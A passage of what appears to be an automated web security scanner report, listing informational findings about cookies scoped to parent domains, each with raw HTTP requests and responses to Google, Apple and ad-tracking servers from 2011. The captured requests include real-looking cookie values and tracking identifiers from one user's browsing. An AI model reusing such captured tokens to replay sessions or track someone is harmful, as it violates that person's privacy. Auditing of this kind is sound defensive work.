The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAAE9TvTdgyDSoIlnihnR2Ctc.gif HTTP/1.1
Host: id.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=https%3A%2F%2F174.36.18.902006%2FWizard%2FStart%3FsiteId%3D92907014f563ac53317555e74a1a1a26
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SNID=48=3sKS7bI5pvhoRuaaVyOwnANTv3IHSjqlT0AOE4t_=ZEgwkR1lBvPg8GAt; PREF=ID=381be2a5a4e321de:U=17ea5243225a615b:FF=0:TM=1305295666:LM=1306388828:GM=1:S=c4JmgYF7VRiR-ADW; W6D=v4=0:ds=0:w=1:l=-141:q=0; NID=48=gPq60pUohrGmLnFu_Ata0ovkHaLAI3GbueMkejeohV4ZqsGCTpIwQhkOzLAh08W_WAFKPR6RtENmsRNVdlciFgd2RjpIiQlszeOza-qAv-NiJqt_HnSDwtRgsq1TNt5I

Response

HTTP/1.1 200 OK
Set-Cookie: SNID=48=rlT8MZiINKBIrkeXfgIJb9vgNjpXk4t90QexqxjC=nlt533ILJA5-O8o1; expires=Sun, 25-Dec-2011 02:02:42 GMT; path=/verify; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Sat, 25 Jun 2011 02:02:42 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;

12.27. http://id.google.com/verify/EAAAAFJrXTT71NDnXz7YilamQqs.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://id.google.com
Path:   /verify/EAAAAFJrXTT71NDnXz7YilamQqs.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAAFJrXTT71NDnXz7YilamQqs.gif HTTP/1.1
Host: id.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=Spilgames+Internet
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SNID=48=Ur4zoaTzXz_ZUyr_bNG71B00g2QyNve9JxirvLXQ=SpcSyPrhNUXVqSHO; PREF=ID=381be2a5a4e321de:U=17ea5243225a615b:FF=0:TM=1305295666:LM=1306388828:GM=1:S=c4JmgYF7VRiR-ADW; W6D=v4=0:ds=0:w=1:l=-141:q=0; NID=48=gPq60pUohrGmLnFu_Ata0ovkHaLAI3GbueMkejeohV4ZqsGCTpIwQhkOzLAh08W_WAFKPR6RtENmsRNVdlciFgd2RjpIiQlszeOza-qAv-NiJqt_HnSDwtRgsq1TNt5I

Response

HTTP/1.1 200 OK
Set-Cookie: SNID=48=3sKS7bI5pvhoRuaaVyOwnANTv3IHSjqlT0AOE4t_=ZEgwkR1lBvPg8GAt; expires=Sat, 24-Dec-2011 13:26:11 GMT; path=/verify; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Fri, 24 Jun 2011 13:26:11 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;

12.28. http://idcs.interclick.com/Segment.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://idcs.interclick.com
Path:   /Segment.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Segment.aspx?sid=4761888b-4251-4912-8743-09bf2fc2ed75 HTTP/1.1
Host: idcs.interclick.com
Proxy-Connection: keep-alive
Referer: http://www.parallels.com/store/plesk/win/addons/?store_id=1&version=10.0.0&os=windows&key=SMB015741170000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: T=1; uid=u=8fb5e3ac-83a3-4cca-8da7-7f2e4e96648c; sgm=9622=734271&9000=734271&570=734271&410=734271&846=734271&7472=734279&6790=734276&7434=734280&7594=734283&428=734285&11062=734293&11060=734293; tpd=e20=1308573230578&e90=1308838755219&e50=1308573231659&e100=1308838755889

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 70
Content-Type: image/gif
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: sgm=9622=734271&9000=734271&570=734271&410=734271&846=734271&7472=734311&6790=734276&7434=734280&7594=734283&428=734285&11062=734293&11060=734293; domain=.interclick.com; expires=Fri, 25-Jun-2021 02:14:00 GMT; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Sat, 25 Jun 2011 02:13:59 GMT

GIF89a...................!..NETSCAPE2.0.....!.......,................;

12.29. http://images.apple.com/global/nav/styles/navigation.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://images.apple.com
Path:   /global/nav/styles/navigation.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/nav/styles/navigation.css HTTP/1.1
Host: images.apple.com
Proxy-Connection: keep-alive
Referer: http://itunes.apple.com/us/app/exxon-mobil-fuel-finder/id397136849?mt=8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72CC1050115FB-600001068002ECF7[CE]
If-None-Match: "2930-4a3055a8a0000"
If-Modified-Since: Wed, 11 May 2011 19:48:16 GMT

Response

HTTP/1.1 304 Not Modified
Content-Type: text/css
Last-Modified: Wed, 11 May 2011 19:48:16 GMT
ETag: "2930-4a3055a8a0000"
Cache-Control: max-age=354
Expires: Fri, 24 Jun 2011 13:33:51 GMT
Date: Fri, 24 Jun 2011 13:27:57 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ccl=DM6tKPNIkmYZsEVSBSdYOGJ7OTa7PjwA2735gwg+B3srHhFj8YVJDLNI3Wi2SUB1dCqrK7+XltzB/RcTVZmzUffySHH1UmBafoYJMj8YHYwt2pGgPse/fGM3FRGKsYngf6a77lbqVf66I18XlDNjfSTbjjIE0caGcGeQC4Ga/6t7SQdMOjY9JN8DEVW1UMoc6rrdnREZK82vJpIYTfG0q24uni8l6skyzHr5oYaAtC+cEVmOYnxcZEVM/0zwt8pWHHT7wAgPsXOSwDVj2beSsp5/JZ2hxDkV+qJm/gvvlB5s4gKqlC/OkT9MmT5nrCzrHJRdC+dWafIqs+ExZSu4RsRpt+yRsvm+2Ebw4C2MVPVg6mUwoEFIRaz9PCY0pRAq3LXUGVhUO8khrTSYOT60ngG/28nSEmej8riAE3H3pM3Ek1xzfTDSN4w9rduEpmRVOFjfLPb+A3mPF99al/pIw2PdnTJ0NQXeRkmztMT8xZeLjBS/B0mP+3zsHAYthpfDX9LIuH2xTPXrpJX2DeMFKurDBc9hP5LjsnlklHcD2q0g+oy0qYkWk5CBKjp+akzk; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com


12.30. http://images.apple.com/ipod/images/gradient_texture20100901.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://images.apple.com
Path:   /ipod/images/gradient_texture20100901.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ipod/images/gradient_texture20100901.jpg HTTP/1.1
Host: images.apple.com
Proxy-Connection: keep-alive
Referer: http://itunes.apple.com/us/app/exxon-mobil-fuel-finder/id397136849?mt=8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72CC1050115FB-600001068002ECF7[CE]
Range: bytes=2714-2714
If-None-Match: "a9a-48f2afe054800"

Response

HTTP/1.1 200 OK
Last-Modified: Wed, 01 Sep 2010 04:18:40 GMT
ETag: "a9a-48f2afe054800"
Server: Apache/2.2.14 (Unix)
X-N: S
Content-Length: 2714
Content-Type: image/jpeg
Cache-Control: max-age=492
Expires: Fri, 24 Jun 2011 13:36:09 GMT
Date: Fri, 24 Jun 2011 13:27:57 GMT
Connection: close
Set-Cookie: ccl=aJq+T0MKyuiZKEYbLPS03BsnrndkJJe79OF9a4ljFx2tXfiewibK/oLDQsuQHmvLldfmwr3Fy4L0VzGE/FZAmwGvg5eyINeUs6H9+NrRWh7L5rDRBVyuVYqUQ1MwgXZBWE62uEPzY/1srrhHHhDAA10Ed8INN9tddP9eMAan54eOY4CWr5NEeR7RrB9iQTG6DtqTjlAmG+4nNyVZ7jdIh9TtfBW5ttsnApQ+ss6WBwgVTe5XpPrqo6vXs2WkEODHPu2ZTusaew7hlMVTuZRtMsPrG6LtM+2d8bscqWCj9F3eRoX0D8U/rG61IMxp3iNbUfq17yxUGCepcoJpg7GPEIhyCmfIbzlT60df9tGrUeptBxvQJpz6OE9lkpl+jYRzKh1DGjK7WAFpJ5xH1Kah4ZCmugxzD3GHW8pK1NjHPUjSHa3Smmrzk7TAkG42vB8Pcmr55JDy/baPOrMw+rWTRiwgHGZT5gn0erArWxdwwcWIFgXTn4E5/SnP7yr92JudF1hKiiLCcbaD+7DP9RQAV5cMn+xkVVCm1M4Z3+tinPFItTpDIztx2jS0mCWnhZOf; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com

......JFIF.....d.d......Ducky.......F......Adobe.d......................................
.                .

.....
...........................

.............................................................{.$..
...[SNIP]...

12.31. http://m.adnxs.com/msftcookiehandler  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://m.adnxs.com
Path:   /msftcookiehandler

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /msftcookiehandler?t=1&c=MUID%3dE361C23374E642C998D8ABA7166A75EC HTTP/1.1
Host: m.adnxs.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh45.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIImdYCEAoYAiACKAIw2_f97wQQ2_f97wQYAQ..; sess=1; uuid2=3420415245200633085; anj=Kfw)(BAfzI)_c:>YTQ8o9HI:j3Rd8gS=zfXihHsxM81LUQF9wtljE8<[9QgfpqS2HD7RgjO6UmrXplCnP$OBPv9`B`EcP`20sqmn`0A*=p-s1a3^i6HJ$o:ZH*W'mLq=2/=:*Ktve0`y<wiFQIHXHs4Sql-BZ-3'pfeBGUI'6#^/xw?0$!1jg6ERz:32x2S:@Q=-Lk2l`'R#V*']Bct8dIPsrw)DsL6mA9)'NgwW@MOpG/d'G?mm0ZPFj*qGoqQC^#TDIPC<oef.T<+.TWA3mz*6mre/9I/+dcKFbH@hjL*Wx%0.7K@L2I]or2_X$y2+i)!nFb`XWc:Gm!l#EljWaPrrpeaj<Wgq31OWpF+Y:rK>6NF>RW9bA+Hb3C>jZ-p=st1-]]8oRJ6EQ)DSt-Di4V]b6(qzCeK@GY*@qaj86c$W6gk>YRb1P:mG#jFsCtJeXzuFvt2jG-W+%e2k$-DDS)f/clIvy87JLzjO$w7BTd7<h%s4a>Cv%(1vzu#S9OUti[mX0*9Q[ss/Tv7vM0#/-8-vI(2B[=oU6k)RIvSo[*^Pv5H0:^blrQO!b*vb52-vNvuOh`IjH+%hA]..t4+'KGhT@?2!%>z(x84ihPGqQ*qx$lbALU!.1+T5EmuVL@YM2HK.$bb2oxUP71*A)^VE@C!P%mTf_GMkYDUta=IL

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sat, 25-Jun-2011 13:18:54 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Thu, 22-Sep-2011 13:18:54 GMT; domain=.adnxs.com; HttpOnly
Content-Length: 43
Content-Type: image/gif
Date: Fri, 24 Jun 2011 13:18:54 GMT

GIF89a.............!.......,........@..L..;

12.32. http://media.fastclick.net/w/get.media  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media.fastclick.net
Path:   /w/get.media

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /w/get.media?sid=56553&m=6&tp=8&d=j&t=n HTTP/1.1
Host: media.fastclick.net
Proxy-Connection: keep-alive
Referer: http://www.redorbit.com/news/business/1993118/spil_games_selects_adyens_internet_payment_system_for_global_social/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lyc=BwAAAAR47gNOACAAAXBfIASgAAdBUwAAwPX1TUAOAbRHQAWAAABKIAYBFPPgCRdAAAAPoBfgAwBALwIKuvBgRwFQW+ABGQalTAAA7+znYBcBaFbgARcBoUXgAQsBvUTgAQsDeVcAAA==; pjw=BAEAAAACIAMDlZAETiAGAQABIAMCkbAEYAcCRcEIIA1AEwEAAA==; adv_ic=BxEAAACVkAROIAYGAAFJAACGYSAHIAtAAAM/zNdNQAdAFwH0WSAHQAwgAAAC4AIXAM3gAhcBw8vgAS8BaVrgAS8AseACFwHIYOABFwCg4AIXAbRWIFcgW0AAADjgAhcB61zgARcAMeACFwH7X+ABRwAk4AIXANjgAl8AA+ACFwA24AIvAdzK4AGnANPgAr8A2eACFwA+4AK/ANPgAhcAjCEpwKcA0OACFwFHU+ABjwDM4AIXAaJS4AEXAMngAhcA4+ACjwFsseABjwTNTwAACkEEAgAAAA==; pluto=173274949960|v1

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:31:01 GMT
Content-Type: application/x-javascript
P3P: CP="NOI DSP DEVo TAIo COR PSA OUR IND NAV"
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Content-Length: 297
Set-Cookie: pjw=BAIAAAACIAMDj5EETiAGAQABIAMCkbAEYBMCRcEIIA2AEwCV4AIfAYStgB8BcbqAHwMGAAAA; domain=.fastclick.net; path=/; expires=Sun, 26-Jun-2011 13:31:01 GMT
Set-Cookie: adv_ic=BxIAAACVkQROIAYJAAFJAABAYQAAAiALQAAAj+ACFwCG4AIXAz/M101AH0AvAfRZIAdADCAAAALgAhcAzeACFwHDy+ABLwFpWuABLwCx4AIXAchg4AEXAKDgAhcBtFYgVyBbQAAAOOACFwHrXOABFwAx4AIXAftf4AFHACTgAhcA2OACXwAD4AIXADbgAi8B3MrgAacA0+ACvwDZ4AIXAD7gAr8A0+ACFwCMIUHApwDQ4AIXAUdT4AGPAMzgAhcBolLgARcAyeACFwDj4AKPAWyx4AGPBM1PAAAKQQQCAAAA; domain=.fastclick.net; path=/; expires=Sat, 23-Jun-2012 13:31:01 GMT
Set-Cookie: pluto=173274949960|v1; domain=.fastclick.net; path=/; expires=Sun, 23-Jun-2013 13:31:01 GMT

{var dz=document;
dz.writeln("<SCRIPT language='JavaScript1.1' SRC=\"http://ad.doubleclick.net/adj/N5763.288148.ADRX/B5223690.13;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=306564&mid
...[SNIP]...

12.33. http://media.fastclick.net/w/tre  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media.fastclick.net
Path:   /w/tre

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /w/tre?ad_id=17597;evt=17799;cat1=22392;cat2=22393;rand=[CACHEBUSTER] HTTP/1.1
Host: media.fastclick.net
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=1494613;type=usfoo615;cat=usfoo777;ord=315899333
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adv_ic=BwYAAAC3stdNIAYGAAFJAADrXCAHIAtAAAGiseABFwGMTuABFwCR4AIXAeNf4AEXAGzgAhcEzU8AAApARCAAAF/gAhcBtFbgAS8AKeACFwF4XcAXAQAA; lyc=BwAAAATA9fVNACAAAbRHIASgAABKIAcBFPPgCRdAAAAPoBfgAwBALwIKuvBgRwFQW+ABGQalTAAA7+znYBcBaFbgARcHoUUAAKrsA05AEQFwX0AFgAABQVOAB0AA4AUXAQAA; pluto=173274949960|v1

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:30:39 GMT
P3P: CP="NOI DSP DEVo TAIo COR PSA OUR IND NAV"
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Content-Type: image/gif
Content-Length: 43
Set-Cookie: lyc=CAAAAAR47gNOACAAAXBfIASgAAdBUwAAwPX1TUAOAbRHQAWAAABKIAYBFPPgCRdAAAAPoBfgAwBALwIKuvBgRwFQW+ABGQalTAAA7+znYBcBaFbgARcGoUUAAI2QBGCPAb1E4AEXAXlX4AEL4AUXAQAA; domain=.fastclick.net; path=/; expires=Sun, 23-Jun-2013 13:30:39 GMT
Set-Cookie: pluto=173274949960|v1; domain=.fastclick.net; path=/; expires=Sun, 23-Jun-2013 13:30:39 GMT

GIF89a.............!.......,...........D..;

12.34. http://network.realmedia.com/RealMedia/ads/adstream_nx.ads/TRACK_Pogo/Retarget_Nonsecure@Bottom3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_nx.ads/TRACK_Pogo/Retarget_Nonsecure@Bottom3

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_nx.ads/TRACK_Pogo/Retarget_Nonsecure@Bottom3 HTTP/1.1
Host: network.realmedia.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/pogo-online-games/lp-GeneralPogo-withoutFB.jsp?sourceid=free_internet_games_Broad_Free_GOO_C0080_A0001_LP0001&ad=6429295350&kw=free+internet+games&sitetarget=
Cookie: OAX=rcHW804Ekc4ABIzz; NXCLICK2=011Qa6UK; NSC_o1efm_qppm_iuuq=ffffffff09499e0e45525d5f4f58455e445a4a423660

Response

HTTP/1.1 302 Found
Date: Fri, 24 Jun 2011 13:32:37 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Set-Cookie: NXCLICK2=011Qa6Uv; expires=Mon, 24-Jun-13 13:32:37 GMT; path=/; domain=.realmedia.com
Location: http://imagen01.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif
Content-Length: 345
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0e45525d5f4f58455e445a4a423660;expires=Fri, 24-Jun-2011 13:33:37 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://imagen01.247realmedia.com/RealMedia/ads/
...[SNIP]...

12.35. http://pixel.quantserve.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel;r=647111455;fpan=0;fpa=P0-1728005155-1308921999956;ns=0;url=http%3A%2F%2Fwww.redorbit.com%2Fnews%2Fbusiness%2F1993118%2Fspil_games_selects_adyens_internet_payment_system_for_global_social%2F;ref=;ce=1;je=1;sr=1920x1200x32;enc=n;ogl=;dst=1;et=1308922015580;tzo=300;a=p-c0n-0mxg7_y5A HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://www.redorbit.com/news/business/1993118/spil_games_selects_adyens_internet_payment_system_for_global_social/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4dcd4b82-3e074-feeab-8b152; d=EEIBswEBiAeB0g4eqT0eThwirRfeKVpIfjDbQKs_YIYACUCkAOZ80iYTCOFdHhDRDhDRy0lDAOEQkdEOVPMNG7MKXhQDBQSEXzPRThAP0w6fKkENpPXaOHENkpGdKRA

Response

HTTP/1.1 302 Found
Connection: close
Location: http://bh.contextweb.com/bh/set.aspx?action=add&advid=357&token=EHEX1
Set-Cookie: d=EOYBrwEBiAeB0g4eqT0eThwijElqSH4w20CrP2CGAAlApADmfNImEwjhXR4Q0Q4Q0ctJQwDhEJHRDlTzDRuzCl4UAwUEhF8z0U4QD9MOnypBDaT12jhxDZKRnSkQ; expires=Thu, 22-Sep-2011 13:26:54 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 0
Date: Fri, 24 Jun 2011 13:26:54 GMT
Server: QS


12.36. http://pixel.rubiconproject.com/tap.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.rubiconproject.com
Path:   /tap.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tap.php?v=6286&nid=2132&put=E3F32BD05A8DDF4D5646D79640088B&expires=365 HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=1524815;type=indiv176;cat=indiv925;ord=1;num=7855084345210.344?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; put_1197=3460050161923843111; khaos=GOVBRMNC-I-DXQD; put_2146=xn7ja41kw4np53teeikidoecxeh9fu6s; put_2188=FoBpo1AIykup_RbIztZ-hw; put_1185=4325897289836481830; lm="20 Jun 2011 13:04:50 GMT"; ruid=154dd07bb6adc1d6f31bfa10^10^1308614585^2915161843; csi15=3140642.js^2^1308614600^1308614602; put_1902=NsCNKTbG1n8vl4t9NZDDK2fBjy8vnIx8N5b7JrdL; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; cd=false; put_1986=3420415245200633085; rpb=7259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1%262112%3D1%262497%3D1%262202%3D1%262496%3D1%262197%3D1%262579%3D1%263512%3D1%263810%3D1%262374%3D1%267249%3D1%267187%3D1%265575%3D1%265852%3D1%264222%3D1%262114%3D1%263672%3D1%264894%3D1; rpx=5671%3D11993%2C298%2C3%2C%2C%264212%3D11993%2C682%2C3%2C%2C%265421%3D11993%2C682%2C3%2C%2C%267259%3D12124%2C145%2C2%2C%2C%265852%3D12124%2C721%2C3%2C%2C%264214%3D12267%2C471%2C2%2C%2C%264338%3D12401%2C0%2C3%2C%2C%26733%3D12401%2C0%2C1%2C%2C%267100%3D12419%2C0%2C1%2C%2C%266198%3D12424%2C82%2C2%2C%2C%266560%3D12435%2C57%2C2%2C%2C%266643%3D12441%2C56%2C2%2C%2C%266432%3D12470%2C0%2C1%2C%2C%265576%3D12675%2C0%2C1%2C%2C%265573%3D12675%2C0%2C1%2C%2C%265720%3D12675%2C0%2C1%2C%2C%262372%3D12738%2C0%2C1%2C%2C%267249%3D12753%2C0%2C1%2C%2C%262112%3D12753%2C0%2C1%2C%2C%262497%3D12753%2C0%2C1%2C%2C%262202%3D12753%2C0%2C1%2C%2C%262496%3D12753%2C0%2C1%2C%2C%262197%3D12753%2C0%2C1%2C%2C%262579%3D12753%2C0%2C1%2C%2C%263512%3D12753%2C0%2C1%2C%2C%263810%3D12753%2C0%2C1%2C%2C%262374%3D12753%2C0%2C1%2C%2C%264222%3D12770%2C86%2C2%2C%2C%267187%3D12806%2C0%2C1%2C14%2C%265575%3D12844%2C0%2C1%2C%2C%262114%3D12857%2C0%2C1%2C%2C%263672%3D12881%2C0%2C1%2C7%2C%264894%3D12881%2C0%2C1%2C%2C

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 17:04:28 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=7259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1%262112%3D1%262497%3D1%262202%3D1%262496%3D1%262197%3D1%262579%3D1%263512%3D1%263810%3D1%262374%3D1%267249%3D1%267187%3D1%265575%3D1%265852%3D1%264222%3D1%262114%3D1%263672%3D1%264894%3D1%266286%3D1; expires=Sun, 24-Jul-2011 17:04:28 GMT; path=/; domain=.rubiconproject.com
